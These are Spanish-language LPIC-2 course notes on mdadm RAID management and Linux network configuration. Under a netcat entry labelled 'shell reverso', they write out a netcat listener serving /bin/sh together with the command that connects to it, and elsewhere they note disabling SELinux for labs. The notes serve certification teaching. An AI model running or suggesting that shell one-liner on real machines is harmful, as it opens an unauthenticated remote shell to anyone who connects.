LPIC2 2021 Sesión 7 (2021-02-23)

• Manual Certificacion LPIC-2.pdf, pag 72
• Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/1-Gestión Avanzada de Discos.pdf
• Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/3-RAID/*
• Presentaciones/2020/201/
• gdrive://
• Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/Gestion de Swap.txt

• en certificación no preguntan por que es cada RAID (0,1,5,6)
• mdadn ← yum install mdadm
• /etc/mdadm/mdadm.conf

• crear partición (100%) del tipo Linux RAID fd en los discos sdb,sdc,sdd
• mdadm -v -C /dev/md0 -n 2 /dev/sdb1 /dev/sdc1 -l 1 –spare-devices=1 /dev/sdd1
  • nuevo dispositivo /dev/md0 (sdb1, sdc1)
    • el nombre ha de ser /dev/mdX
  • RAID Level 1
  • un disco de spare (sdd1)
• formateamos y montamos:
  • mkfs.ext3 /dev/md0
  • mount /dev/md0 /mnt
• dejamos en terminal abierto una monitorización sobre el RAID: watch mdadm –detail /dev/md0
  • forzamos el fallo de uno de los discos: mdadm /dev/md0 -f /dev/sdb1
    • podemos ver en el terminal de watch como el sistema reemplaza el sdb1 por el spare sdd1
  • retiramos el disco «dañado»: mdadm /dev/md0 -r /dev/sdb1
    • vemos como no forma parte del RAID
  • y añadimos «otro»: mdadm /dev/md0 -a /dev/sdb1
  • para eliminar el raid:
    • umount /mnt
    • mdadm --stop /dev/md0
    • mdadm --remove /dev/md0
    • es importante eliminar el superbloque (metadatos): mdamd –zero-superblock /dev/sdb1 /dev/sdb1 /dev/sdc1 /dev/sdd1
    • eliminar configuración: cat /dev/null > /etc/mdadm.conf
    • otro comando: mdadm -As /dev/md0
      • -s: escanea el /etc/mdadm.conf

Sacar un disco de un raid existente y montarlo en un nuevo ordenador, como nuevo raid, para acceder a los datos contenidos

• mdadm --create --verbose /dev/md1 --level=mirror --raid-devices=2 /dev/sdb1 missing
• mount /dev/md1 /mnt

• Material Practicas LPIC-2/LPIC-201/4-Filesystem and Devices/Configuración Almacenamiento ISCSI
• cabinas con openfiler, para conectarnos
• http://clusterfrak.com/sysops/app_installs/openfiler_install/
• https://www.openfiler.com/
• http://vmwareinsight.com/Tutorials/2016/7/5799894/Step-by-Step-Configuration-Guide-for-Using-Openfiler-as-Shared-Storage-in-ESXi-and-vSphere-Environment

• documentos:
  • doc: Manual Certificacion LPIC-2.pdf, pag 145
  • doc: Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configuración de Red en Red Hat Enterprise Linux.pdf
  • doc: Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Configurar la red en RedHat7.txt
• ip a
• nombrar las tarjetas de red con ethX
  • biosdecode
  • modificar /etc/default/grub

    • GRUB_CMDLINE_LINUX="... quiet net.ifnames=0 biosdevname=0"

• archivo de configuración: /etc/sysconfig/network-scripts/ifcfg-<netword_device>
  • al modificar: systemctl restart network, ip link set <network_device> down (y después up
• desactivar IPv6 (si no se ha de utilizar)
• NetworkManager
• hostname
  • centos7:
    • /etc/hostname
    • hostnamectl set-hostname <FQDN>
  • centos6:
    • /etc/sysconfig/network
• modificar /etc/hosts
  • que las máquinas se puedan resolver entre ellas
  • como buena práctica, que sepa resolverse a si misma
• /etc/resolv.conf: servidores DNS para mi máquina
  • nameserver: servidores que resuelven
  • search: sufijo de búsqueda (lo que añade a los nombres que usamos para localizar máquinas)
  • domain: el dominio en el que trabajamos
• netstat -r
  • route add/del…
• alias IP (varias IPs en el mismo interfaz):
  • vi /etc/sysconfig/network-scripts/ifcfg-<interfaz>
    • renombro IPADDR a IPADDR0 y NETMASK a NETMASK0
    • añado IPADDR1 y NETMASK1 con diferente IP
    • systemctl restart network (o networkManager)
  • copiar /etc/sysconfig/network-scripts/ifcfg-<interfaz> en /etc/sysconfig/network-scripts/ifcfg-<interfaz>:0
• forward paquetes (reenvio de paquetes entre 2 redes en 2 interfaces:
  • /etc/sysctl.conf → net.ipv4.ip_forward = 1 → sysctl -p (aplicar)
• /etc/nsswitch.conf
  • resolución usuarios
• nmtui: networkManager «GUI»
  • yum install NetworkManager-tui -y
• nmcli: networkManager «CLI»
  • Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Lab interfaces de red con nmcli.txt
  • nmcli connection show
  • nos permite crear los ficheros de configuración (desde cero) en un comando
• debian:
  • /etc/network/interfaces
  • service networking restart
• Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Problemas de red en Linux.pdf
• route
• arp
• ss, netstat (deprecado por ss)
  • netstat -tan | grep -i listen: que estoy ofreciendo TCP
  • netstat -putan | grep -i listen
• nc: netcat, navaja suiza ← desinstalar ← yum remove nc?
  • Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Explicacion Topic 110 Security.txt
  • shell reverso
    • nc -lvp 1234 -e /bin/sh &
    • nc 192.168.2.5 1234
• /etc/sysconfig/selinux → disabled (preparativos para laboratorios)
  • y reiniciar (no hay servicio que controle esto)
• tcpdump
• nmap
  • yum install nmap-frontend -y → zenmap: frontend gráfico

• traceroute
• mtr
• dmesg
• /etc/host.allow, /etc/host.deny : desuso (TCP wrappers)
  • Manual Certificacion LPIC-2.pdf, pag 155
  • Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Explicacion Topic 110 Security.txt
  • strings -f /usr/sbin/sshd | grep hosts_access: programas que lo soportan
  • 3 etapas de comprobación de acceso a un servicio embebido TCP:
    • está autorizado expresamente
    • está denegado expresamente
    • permitido por defecto
  • usa expresiones en sus ficheros de configuración para permitir (o denegar)
    • ALL
    • LOCAL
    • UNKOWN
    • KNOWN
    • PARANOID
    • EXCEPT
  • permitimos en allow, denegamos en deny (o tendrá acceso por la tercera regla)
  • Material Practicas LPIC-2/LPIC-201/5-Networking Configuration/Problemas de red en Linux.pdf
  • sar: monitorización interfaces
    • sar